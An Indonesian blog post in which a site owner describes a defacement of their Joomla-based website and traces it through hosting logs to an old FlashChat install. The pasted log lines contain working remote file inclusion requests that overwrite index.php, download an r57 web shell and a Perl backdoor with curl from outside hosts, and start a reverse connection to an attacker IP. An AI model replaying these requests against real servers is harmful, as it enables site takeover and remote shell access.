Bangun tidur ku terus online… buka website… lho ? heh ? kok dihack ? Weleh, di hack lagi ?
Meski ndak parah banget, cuman di ganti isi file index.phpnya jadi “q8″. Googling-googling informasi tentang q8, dapetnya ndak jelas. Terlalu banyak yang make q8. Di website joomla sendiri hanya ada 2 orang yang nemuin problem yang sepereti ini, namun belum nemu apa sebab dan bagaimana solusinya selain ngrubah index.phpnya dengan file asli.
Kemudian nyoba ngecek log file lewat cpanel hosting, ketemu juga biang keladinya. Suspected to IP 62.150.154.69 and 213.219.122.11. This guy nemuin bekas folder FlashChat di folder lama yang waktu itu memang lagi coba coba pakai FlashChat.
Log file :
/chat/appdata/.h.php HTTP/1.1″ 500 - “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gulflobby.com/lobby/upload/cR.txt?&cmd=cd%20/home/websiteku/public_html;echo%20q8%20>%20index.php HTTP/1.1″ 200 783 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
/ HTTP/1.1″ 200 15 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
/ HTTP/1.1″ 200 15 “http://www.zone-h.org/component/option,com_attacks/Itemid,45/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gulflobby.com/lobby/upload/cR.txt?&cmd=cd%20/home/websiteku/public_html/forum/chat/appdata;curl%20-o%20./r57.txt%20http://www.terradibari.it/chat/.jr7/r57.txt;mv%20r57.txt%20.h.php;ls%20-la HTTP/1.1″ 200 1808 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gulflobby.com/lobby/upload/cR.txt?&cmd=cd%20/home/websiteku/public_html/forum/chat/appdata;curl%20-o%20./backdoor.pl%20http://www.terradibari.it/chat/.jr7/backdoor.pl;ls%20-la HTTP/1.1″ 200 1945 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gulflobby.com/lobby/upload/cR.txt?&cmd=cd%20/home/websiteku/public_html/forum/chat/appdata;chmod%20777%20backdoor.pl;perl%20backdoor.pl%2062.150.154.69%202121 HTTP/1.1″ 200 783 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gulflobby.com/lobby/upload/cR.txt?&cmd=cd%20/home/websiteku/public_html/forum/chat/appdata;perl%20backdoor.pl%2062.150.154.69%202121 HTTP/1.1″ 200 783 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
/ HTTP/1.0″ 200 3 “-” “Wget/1.9.1″
/ HTTP/1.1″ 200 15 “http://www.zone-h.org/component/option,com_attacks/Itemid,45/filter_defacer,Dr.jr7″ “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
/index.php HTTP/1.1″ 200 15 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
Post a Comment